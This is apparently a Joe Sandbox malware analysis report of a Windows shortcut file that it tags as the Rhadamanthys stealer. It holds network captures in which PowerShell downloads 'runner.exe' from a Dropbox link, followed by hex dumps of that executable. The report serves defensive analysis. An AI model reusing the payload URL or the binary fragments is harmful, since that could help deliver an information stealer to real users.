2024-12-17 11:13:44 UTC	16384	IN	Data Raw: 51 18 94 6c 67 a6 be 6f af d1 66 af 6e e5 a2 55 46 bd de e4 4a ec 37 bc b8 7a 54 d9 a2 cd bd 7b 72 32 37 d7 24 99 8d fd 8c c5 23 86 57 b5 d5 2f ea 92 e3 73 2b f6 d0 16 bc 11 4c 34 56 f3 bb 3f 96 83 49 78 8d de e2 42 a3 b7 a4 b0 de c8 76 18 f7 19 b9 71 43 ac dc 13 2c a7 57 61 d1 48 df b0 6b 07 49 a7 b9 22 43 74 e1 5e 47 79 5e 6d 8b 7b 52 a3 c3 f2 bc 72 57 9b 14 7e 5f 3c a6 2e 26 0b 65 d1 ef 64 4b c1 06 83 3d c4 74 41 55 4d 96 cc 6c ce 08 b1 78 6f a2 31 83 b2 bd d9 dc 9b ed cf de 99 7d 3c 5b c9 4e 90 e2 b8 7a bc fc d6 d3 66 bc d4 54 4a 77 1d 64 03 19 de 11 91 58 61 51 cf 5f 75 7a ca c9 be e9 5b 7e a5 77 32 cb 72 66 65 66 71 1d 67 82 71 9d de d5 df 3a c0 3a d0 2a 74 49 d9 f1 2e 53 76 5a 7a 6a 3a d7 39 94 84 46 b2 e9 32 1a 59 bf 38 a4 52 62 91 ca 62 f6 46 66 Data Ascii: QlgofnUFJ7zT{r27$#W/s+L4V?IxBvqC,WaHkI"Ct^Gy^m{RrW~_<.&edK=tAUMlxo1}<[NzfTJwdXaQ_uz[~w2rfefqgq::*tI.SvZzj:9F2Y8RbbFf
2024-12-17 11:13:44 UTC	16055	IN	Data Raw: f7 8f f9 69 ff f7 e9 5f 52 2c 56 ca d5 54 17 fe c8 c2 72 fe b5 68 6d 6b ab 7d f5 0f 98 02 f6 af 11 5c 56 a9 d5 4c 41 8f ca 05 b4 ab 70 a0 70 b0 c0 14 7c e0 cf 0b 12 a8 52 a1 5c cd 31 63 03 68 00 ae cd 8a b5 1c 37 7e 32 21 bb 49 e3 77 84 b7 1a 00 92 c5 62 c5 0a 38 a0 46 d3 28 4d 64 b7 29 50 3a 90 46 6b d2 c3 e9 c9 f4 c9 b4 29 6d 83 3d d3 f3 bc 32 6e fc bb ee 04 43 93 be 41 d9 5a d8 aa 6f 3d 84 ef b9 79 2b 1c 1a 12 a5 d2 56 db 81 fb 97 a1 65 84 f1 5a 56 54 bc c8 ee 1d f6 fe 1c 3b 97 fa dc 7f e8 0e 92 e3 22 01 10 f1 92 df e8 ad d3 df d7 5d 0f d6 50 ad 58 60 fa 19 ba 9f 41 14 23 c3 82 74 f8 56 fa c3 25 52 e3 b3 32 f0 f5 00 df a1 f1 14 5c 23 73 f5 96 ad cf a0 1b a9 18 b2 1c d9 0f c3 43 c6 e4 a2 d1 e9 d1 19 d2 98 d6 46 4f cb da c8 fb 64 43 33 26 0e 8f c8 a7 31 Data Ascii: i_R,VTrhmk}\VLApp\|R\1ch7~2!Iwb8F(Md)P:Fk)m=2nCAZo=y+VeZVT;"]PX`A#tV%R2\#sCFOdC3&1
2024-12-17 11:13:44 UTC	329	IN	Data Raw: 42 08 04 7a 67 ba ae 81 f1 8f 46 9d 7a d6 e5 5a 88 2b 51 d1 55 6d 06 74 86 50 bd 0c be b2 f5 d3 db ba 43 c6 fc e0 b0 c3 96 ab 74 a5 7c c1 44 82 e2 ba 46 b7 f6 1f b6 d6 fc fa 68 b6 98 f2 71 c9 72 29 63 61 a3 4e f7 ca 58 6d ba e2 a5 ab 9f b8 9e cb 59 45 8f dc 9f c0 a3 b9 c1 94 53 f0 cb 3d 3d 15 47 f7 78 c6 ad d1 10 16 36 52 1a c9 c8 23 39 bf d6 ea 30 69 71 07 8c 30 8c 6c b2 2f 9b 1b 91 7d 56 0d 41 5c fa 9a 4e 27 d5 46 05 66 7c 65 05 c7 91 ae 5f 71 f9 97 1a 1c e2 b0 81 1d 6a 0a 1b 64 50 71 8c 38 f0 bd 32 a8 37 1a 58 20 18 04 21 18 b4 f7 2d 2e 9e d2 67 3b 03 29 ca ac 4a 81 54 30 00 e0 d7 6d 94 72 8d c6 ba 2a a8 e6 20 9c be e3 96 a2 68 7d 96 46 01 a2 07 d1 0b 12 8e 2e c0 78 b1 bd fa 09 8c 1a 91 d9 9e 43 0b db 42 f4 00 21 43 2c 18 62 27 af 41 9d d5 10 3a 6e 8b Data Ascii: BzgFzZ+QUmtPCt\|DFhqr)caNXmYES==Gx6R#90iq0l/}VA\N'Ff\|e_qjdPq827X !-.g;)JT0mr* h}F.xCB!C,b'A:n
2024-12-17 11:13:44 UTC	16384	IN	Data Raw: c9 db 1a b7 3d bb 7f eb c9 dd fd 11 6b ac c0 44 63 29 8f d3 56 1b 1a ae 89 63 0f 9e 3d 78 f3 0f 4f 4d 85 ac 94 49 8f 6b ac 41 1f 92 52 2f 94 d2 4d 10 5b 7e ac 88 ed 68 72 27 d2 a0 96 06 d5 d4 23 29 bc 16 05 0f 19 c1 08 09 86 09 30 84 03 2d a2 4b c0 96 08 26 1e 4b 3c 9d d0 24 12 ae b2 9f 2e 8a 2e 5e 90 68 de 4a 15 65 c9 c7 63 cb 41 06 e4 f9 f7 d5 71 83 33 f3 4b 19 8a 85 b0 01 e1 68 79 d8 0f 54 2a 68 da 20 82 d5 b8 e3 f1 f7 1e 1b b6 25 46 ca bd 77 1c bd b3 a1 6c 49 75 05 4c 36 a1 1c 01 35 4a 4c ca 6e df f4 cc 96 95 f2 c0 ad 4f 6f b1 c6 62 12 45 5c 58 75 ff 37 67 22 3b f6 ed 4e 40 d1 d6 88 96 60 21 82 1f 4d 77 05 8d c2 a5 9b 08 bd 96 b0 46 1a db 1e dc b0 ef 99 23 75 40 10 00 a2 a2 04 65 6a 2f 6c 77 11 bb a1 59 8e 48 a2 d5 6a a7 69 11 ad 7c 12 14 81 28 a6 cb Data Ascii: =kDc)Vc=xOMIkAR/M[~hr'#)0-K&K<$..^hJecAq3KhyT*h %FwlIuL65JLnOobE\Xu7g";N@`!MwF#u@ej/lwYHji\|(
2024-12-17 11:13:44 UTC	16384	IN	Data Raw: 27 cb 47 8c 2b bd b6 b1 c2 c6 78 e6 d3 8c 29 7d 26 4e 2d e8 77 c3 63 75 f7 23 ef 3c d4 aa a9 5b 54 db dc fc 4a 9a 91 b1 a6 32 c6 d4 cc ba 95 2d de dd cd 6f 0e 60 ec e6 cd 8c e9 1f 9a d7 3c 7f d1 fa 77 d5 41 8c 2d a9 67 cc 16 98 df 74 fa bc d7 ca 77 14 32 b6 6d 14 63 f6 0f 1a 1b 6a eb 3b 0f df f3 1a da b3 a2 bd 81 8d 70 d8 ee 49 3f 88 34 da 63 59 8d 8b 5a 56 0f 1b 63 3c 84 f4 47 8c 2d 9c d9 b4 a4 ae b6 ed c8 a6 53 18 db d5 9b b1 41 86 45 b5 ab 9b f3 17 65 ff 09 f9 8d 28 ef 5d d4 d0 52 7b ed d9 5b 57 32 de 7d 2f d2 e7 2c ae 5d d4 e0 8a bf 70 05 63 9f e1 99 7d 5a 9a 97 2c 6f e9 72 b3 8d 18 cf 9d a2 7c f3 b2 86 e6 db 7f 58 f0 08 63 6b 2f c6 e3 be 67 62 2e 0c 23 2e 5a 18 77 f5 b7 73 ec 43 bf 66 a9 26 26 ec c1 4f d6 3e 27 f8 9d ef 6e 7d f2 87 43 47 5a e3 3e 35 Data Ascii: 'G+x)}&N-wcu#<[TJ2-o`<wA-gtw2mcj;pI?4cYZVc<G-SAEe(]R{[W2}/,]pc}Z,or\|Xck/gb.#.ZwsCf&&O>'n}CGZ>5
2024-12-17 11:13:44 UTC	8544	IN	Data Raw: 1d 4b 08 48 1c 19 42 6c 58 e3 d4 c8 32 a0 b4 fc cb 65 7b 3a 6f eb eb 54 26 bf d8 7a eb 67 67 eb 34 2d 5b e9 5b 35 62 d4 8d 76 e5 bd a2 12 5a f7 fd ce 67 e4 cf 6f 3b 6f 38 32 89 27 5c b4 6a e6 2f 61 da 81 7d 3c 9e 76 d9 ea d5 e2 cd e0 fc 4b d1 1b 84 e1 75 ee 26 8c 9f a0 71 1e b3 fe cc 45 e5 5a e1 05 c1 98 b0 77 b7 d3 56 ae 39 b7 78 a2 f5 51 ff e3 d7 fc 44 1d 16 0e b2 4f 7c b3 f3 85 de f9 4b f1 b9 21 5d 0f 2e 90 5d 59 39 e4 a8 5b 16 e7 89 a7 62 77 95 6d d9 88 3e 5b 4f da 46 ba f6 9b 32 ee 6a b6 57 72 ee b1 79 0d 1b f4 ef f7 8d ac cc e1 d9 77 69 97 0e ec 55 e7 df bc b8 2d db e3 f9 e2 62 a7 c7 64 b1 d3 23 a3 79 f9 7c ae b8 d8 e9 1a b4 5d ae 71 36 75 3a 06 4d 87 79 5c fe 87 67 d3 62 6e aa a5 8d c1 9d 8e 70 3c 2d e6 86 83 6d bb 42 47 47 88 67 96 f4 a8 0c 6b 3e Data Ascii: KHBlX2e{:oT&zgg4-[[5bvZgo;o82'\j/a}<vKu&qEZwV9xQDO\|K!].]Y9[bwm>[OF2jWrywiU-bd#y\|]q6u:My\gbnp<-mBGGgk>

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:46 UTC	212	OUT	GET /scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.dropbox.com
2024-12-17 11:13:47 UTC	4091	IN	HTTP/1.1 302 Found Content-Security-Policy: img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; media-src https://* blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/sp [TRUNCATED] Content-Type: text/html; charset=utf-8 Location: https://uc60c26e4725b7ba7605f3b031bb.dl.dropboxusercontent.com/cd/0/get/CgadaRKEOwA5MRXWVZEddfKXWjH49vGPTAekNX7Bpm--a51ygSd0CsbtwPHWRIXTK8-0SMPpL0xdj14LYOPhHdc7dfKCIAlM3qNNc5kiKML9oFhkYTsAOXAirCTSR12pCC7Hy1h-mMeoIsIpvfrIm5hF/file?dl=1# Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MjQ4NDU3OTMyNTI0MTg2ODQzNTkxNjA3MjAyOTg0NDg4ODI3NTE5; Path=/; Expires=Sun, 16 Dec 2029 11:13:46 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=2dnM5bLcBF86R8pMaLg1MsuZ; Path=/; Domain=dropbox.com; Expires=Wed, 17 Dec 2025 11:13:46 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=2dnM5bLcBF86R8pMaLg1MsuZ; Path=/; Expires=Wed, 17 Dec 2025 11:13:46 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=aghl1pdnmM; Path=/; Expires=Wed, 17 Dec 2025 11:13:46 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 16 Dec 2029 11:13:46 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Length: 17 Date: Tue, 17 Dec 2024 11:13:46 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: a1718074a6a744eeb4b8e23da7637bbd Connection: close
2024-12-17 11:13:47 UTC	17	IN	Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e Data Ascii: ...status=302-->

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report pkqLAMAv96.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Rhadamanthys

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_fdda5f19-1af5-4f6c-84e0-edef08221a25\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA08.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA48.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA78.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1f0ca465-b589-4fb8-aa38-323b69634454.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\343bd347-52d1-45d2-9621-0c11e074ecd8.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\45a71e02-bc1c-4149-9383-aed3a0ad7db7.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4a0b49dc-e951-4f4d-bc8b-ce9b73b0b78d.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\761fbc19-56a0-428c-9dd9-be3cc277c4dc.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9280a3ff-4c3b-4ac6-9a27-bb661cdf5f68.tmp

Windows Analysis Report
pkqLAMAv96.lnk

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:48 UTC	370	OUT	GET /cd/0/get/CgadaRKEOwA5MRXWVZEddfKXWjH49vGPTAekNX7Bpm--a51ygSd0CsbtwPHWRIXTK8-0SMPpL0xdj14LYOPhHdc7dfKCIAlM3qNNc5kiKML9oFhkYTsAOXAirCTSR12pCC7Hy1h-mMeoIsIpvfrIm5hF/file?dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: uc60c26e4725b7ba7605f3b031bb.dl.dropboxusercontent.com Connection: Keep-Alive
2024-12-17 11:13:50 UTC	739	IN	HTTP/1.1 200 OK Content-Type: application/binary Accept-Ranges: bytes Cache-Control: max-age=60 Content-Disposition: attachment; filename="runner.exe"; filename*=UTF-8''runner.exe Content-Security-Policy: sandbox Etag: 1734099436681829d Pragma: public Referrer-Policy: no-referrer Vary: Origin X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Robots-Tag: noindex, nofollow, noimageindex X-Server-Response-Time: 269 X-Webkit-Csp: sandbox Date: Tue, 17 Dec 2024 11:13:49 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 25100288 X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 02ab129dbb64486ea9bfe822ee4bc9d2 Connection: close
2024-12-17 11:13:50 UTC	15645	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7a b1 4e 09 3e d0 20 5a 3e d0 20 5a 3e d0 20 5a a9 14 5e 5a 3a d0 20 5a 19 16 5d 5a 7d d0 20 5a c1 f0 24 5a 3c d0 20 5a 6a f3 11 5a 3f d0 20 5a 19 16 4d 5a a0 d1 20 5a 3b dc 7d 5a 3c d0 20 5a fd df 40 5a 3f d0 20 5a fd df 7d 5a 25 d0 20 5a fd df 7f 5a 3d d0 20 5a 19 16 5b 5a 38 d0 20 5a 3e d0 21 5a 38 d1 20 5a 19 16 4e 5a ee dc 20 5a 19 16 5a 5a 3f d0 20 5a 19 16 5c 5a 3f d0 20 Data Ascii: MZ@(!L!This program cannot be run in DOS mode.$zN> Z> Z> Z^Z: Z]Z} Z$Z< ZjZ? ZMZ Z;}Z< Z@Z? Z}Z% ZZ= Z[Z8 Z>!Z8 ZNZ ZZZ? Z\Z?
2024-12-17 11:13:50 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 81 ec 04 01 00 00 6a 01 6a 1a 68 e0 85 99 01 6a 00 ff 15 90 0d 9d 02 68 10 7d 68 01 68 04 01 00 00 68 e0 85 99 01 e8 e8 5a 5b 00 83 c4 0c 6a 00 68 e0 85 99 01 6a 00 ff 15 94 0d 9d 02 68 e0 85 99 01 8d 44 24 04 68 04 01 00 00 50 e8 f1 5b 5b 00 68 34 7f 68 01 8d 4c 24 10 68 04 01 00 00 51 e8 ae 5a 5b 00 68 bc 7c 68 01 8d 54 24 1c 68 04 01 00 00 52 e8 9a 5a 5b 00 8b 8c 24 30 01 00 00 8b 94 24 2c 01 00 00 83 c4 24 8d 04 24 50 51 52 68 98 7f 68 01 68 b0 7f 68 01 68 a8 7f 68 01 ff 15 9c 0a 9d 02 81 c4 04 01 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: jjhjh}hhhZ[jhjhD$hP[[h4hL$hQZ[h\|hT$hRZ[$0$,$$PQRhhhhhh
2024-12-17 11:13:50 UTC	739	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii:
2024-12-17 11:13:50 UTC	16384	IN	Data Raw: d8 1b c0 f7 d8 c3 cc cc cc cc cc cc cc cc cc cc 0f b6 44 24 04 0f b6 80 b8 77 88 01 d1 e8 83 e0 01 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 89 41 14 c2 04 00 cc cc cc cc cc cc 8b 44 24 04 89 41 18 c2 04 00 cc cc cc cc cc cc 8b 44 24 04 89 41 1c c2 04 00 cc cc cc cc cc cc e9 19 31 5b 00 cc cc cc cc cc cc cc cc cc cc cc e9 4f 18 5b 00 cc cc cc cc cc cc cc cc cc cc cc e9 29 33 5b 00 cc cc cc cc cc cc cc cc cc cc cc 83 c1 08 b8 01 00 00 00 f0 0f c1 01 c3 cc cc cc 8b 41 0c c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 08 8b 4c 24 04 50 51 b9 a8 32 9a 02 e8 5c 6a 4e 00 c3 cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 50 b9 a8 32 9a 02 e8 71 5e 4e 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8d 51 08 83 c8 ff f0 0f c1 02 48 a9 ff ff ff Data Ascii: D$wD$AD$AD$A1[O[)3[AD$L$PQ2\jND$P2q^NQH
2024-12-17 11:13:50 UTC	16020	IN	Data Raw: 89 48 04 c3 cc cc cc cc cc cc cc cc cc cc cc cc 53 33 db 83 c8 ff 56 8b f1 8d 4e 28 88 1e 88 5e 01 88 5e 02 88 5e 03 89 46 08 89 46 10 89 46 14 89 46 18 89 5e 1c 89 5e 20 e8 22 fc ff ff 89 5e 2c 8b c6 5e 5b c3 cc cc cc cc cc cc cc cc cc cc 8b 44 24 08 85 c0 75 05 e8 73 99 4e 00 50 e8 9d 99 4e 00 6a ff 50 8d 44 24 14 6a 04 50 e8 ac ec 5a 00 8b 54 24 18 8d 4c 24 1c 51 68 34 92 68 01 52 e8 fa f9 ff ff 83 c4 20 c3 cc cc cc cc cc cc 6a ff 68 18 60 52 01 64 a1 00 00 00 00 50 56 a1 ac e8 8e 01 33 c4 50 8d 44 24 08 64 a3 00 00 00 00 8b 74 24 24 83 fe 0a 75 0b a1 48 b4 99 01 85 c0 74 02 ff d0 b9 54 b4 99 01 c7 44 24 24 54 b4 99 01 e8 d9 84 00 00 8b 44 24 1c 8b 4c 24 18 85 c9 c7 44 24 10 00 00 00 00 89 70 14 c7 40 10 00 00 00 00 74 05 e8 c6 af 00 00 b9 54 b4 99 01 Data Ascii: HS3VN(^^^FFFF^^ "^,^[D$usNPNjPD$jPZT$L$Qh4hR jh`RdPV3PD$dt$$uHtTD$$TD$L$D$p@tT
2024-12-17 11:13:50 UTC	364	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 85 c0 75 05 a1 e8 b4 99 01 89 01 c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b c1 b9 08 00 00 00 8b f8 f3 a5 5f 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc 8b 41 08 83 c0 01 33 d2 39 41 04 0f 94 c2 8a c2 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 33 c0 89 01 89 41 04 89 41 08 89 41 0c 89 41 10 89 41 14 89 41 18 89 41 1c c3 cc cc cc cc cc cc 8b 01 33 d2 3b 41 04 0f 9e c2 8a c2 c3 cc cc cc c7 01 00 00 00 00 c7 41 04 ff ff ff ff c6 41 0c 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc c7 01 84 96 68 01 c3 cc cc cc cc cc cc cc cc cc f6 44 24 04 01 56 8b f1 c7 06 84 96 68 01 74 09 56 e8 90 a0 5a 00 83 c4 04 8b c6 5e c2 04 00 cc 8b c1 33 c9 c7 00 84 96 68 01 89 48 04 89 48 08 c3 cc cc Data Ascii: D$uVt$W_^A39A3AAAAAAA3;AAAhD$VhtVZ^3hHH
2024-12-17 11:13:50 UTC	16384	IN	Data Raw: 57 8b 7c 24 10 85 ff 76 1b 8b 4c 24 0c 8b 54 24 08 56 8b f7 8a 02 88 01 83 c1 01 83 c2 01 83 ee 01 75 f1 5e 8b c7 5f c3 cc cc cc cc cc cc cc cc 8b 44 24 04 8b 4c 24 08 56 8b 74 24 10 56 50 51 e8 5b be 5a 00 83 c4 0c 8b c6 5e c3 cc cc cc cc 8b 4c 24 04 8b 44 24 0c 0f b6 11 50 8b 44 24 0c 52 50 e8 69 c5 5a 00 83 c4 0c 33 c0 c3 cc cc cc 8a 81 7c 03 00 00 c6 81 7c 03 00 00 00 c3 cc cc c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 0c c7 00 a9 00 00 00 b0 01 c2 0c 00 cc c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 41 20 8b 80 1c 02 00 00 c3 cc cc cc cc cc cc 8b 41 20 8b 80 20 02 00 00 c3 cc cc cc cc cc Data Ascii: W\|$vL$T$Vu^_D$L$Vt$VPQ[Z^L$D$PD$RPiZ3\|\|D$A A
2024-12-17 11:13:50 UTC	16384	IN	Data Raw: b0 01 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc 83 ec 08 56 8b f1 8b 56 10 8d 44 24 08 50 8d 4c 24 08 51 68 80 00 00 00 68 ff ff 00 00 52 c7 44 24 1c 04 00 00 00 ff 15 14 0f 9d 02 8b 44 24 10 66 3b 44 24 06 74 41 8b 56 10 66 89 44 24 06 8b 44 24 08 50 8d 4c 24 08 51 68 80 00 00 00 68 ff ff 00 00 52 c7 46 08 00 00 00 00 ff 15 18 0f 9d 02 83 f8 ff 75 12 ff 15 20 0f 9d 02 89 46 08 32 c0 5e 83 c4 08 c2 04 00 b0 01 5e 83 c4 08 c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 08 56 8b f1 8b 56 10 8d 44 24 08 50 8d 4c 24 08 51 68 80 00 00 00 68 ff ff 00 00 52 c7 44 24 1c 04 00 00 00 ff 15 14 0f 9d 02 8a 44 24 10 33 c9 66 39 4c 24 04 0f b6 d0 0f 95 c1 3b d1 74 48 8b 54 24 08 33 c9 84 c0 0f 95 c1 52 8d 44 24 08 50 68 80 00 00 00 68 ff ff 00 00 c7 46 08 Data Ascii: ^VVD$PL$QhhRD$D$f;D$tAVfD$D$PL$QhhRFu F2^^VVD$PL$QhhRD$D$3f9L$;tHT$3RD$PhhF
2024-12-17 11:13:50 UTC	16384	IN	Data Raw: 01 7c 30 0c 8d 74 30 0c 8b 71 1c 01 7c 30 10 85 d2 8d 74 30 10 0f 85 75 ff ff ff 5f 5e 5b c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b f1 8d 46 04 68 00 10 00 00 50 89 06 ff 15 34 0c 9d 02 8b 3d 50 0c 9d 02 33 db 53 53 6a 01 53 c7 46 1c ff ff ff ff 89 5e 20 89 5e 24 89 5e 28 ff d7 53 53 53 53 89 46 2c ff d7 53 53 6a 01 89 46 4c 53 89 5e 6c ff d7 53 53 53 53 89 46 70 ff d7 89 86 90 00 00 00 5f 89 9e b0 00 00 00 8b c6 5e 5b c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 8b 06 50 ff 15 40 0c 9d 02 83 46 24 01 83 7e 28 00 7e 09 56 8d 4e 2c e8 e1 61 01 00 83 7e 20 00 7d 1a 57 8d 7e 2c 8d a4 24 00 00 00 00 56 8b cf e8 c8 61 01 00 83 7e 20 00 7c f2 5f 83 46 20 01 83 46 24 ff 8b 0e 51 ff 15 44 0c 9d 02 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|0t0q\|0t0u_^[SVWFhP4=P3SSjSF^ ^$^(SSSSF,SSjFLS^lSSSSFp_^[VP@F$~(~VN,a~ }W~,$Va~ \|_F F$QD^
2024-12-17 11:13:50 UTC	16384	IN	Data Raw: 14 89 44 24 2c 8b bc 24 88 01 00 00 66 83 7d 00 2e 0f 85 7e 00 00 00 0f b7 45 02 83 c5 02 66 3d 2a 00 89 6c 24 14 89 54 24 30 75 21 8b 07 83 c7 04 83 c5 02 3b c3 89 bc 24 88 01 00 00 89 6c 24 14 7d 4e 89 5c 24 30 89 5c 24 1c eb 48 66 3d 30 00 72 42 66 3d 39 00 77 3c 0f b7 4d 02 83 c5 02 0f b7 c0 83 e8 30 66 83 f9 30 89 6c 24 14 72 21 66 83 f9 39 77 17 8d 14 80 83 c5 02 0f b7 c1 0f b7 4d 00 66 83 f9 30 8d 44 50 d0 73 e3 89 6c 24 14 89 44 24 1c 0f b7 45 00 66 3d 68 00 ba 6c 00 00 00 74 05 66 3b c2 75 28 0f b7 c0 83 c5 02 66 3b c2 89 44 24 24 89 6c 24 14 75 15 66 39 55 00 75 0f 83 c5 02 c7 44 24 24 32 00 00 00 89 6c 24 14 0f b7 4d 00 0f b7 f1 0f b7 c6 83 c0 bc 83 f8 25 77 2c 0f b6 80 34 cb 41 00 ff 24 85 20 cb 41 00 be 64 00 00 00 eb 17 be 64 00 00 00 eb 0c Data Ascii: 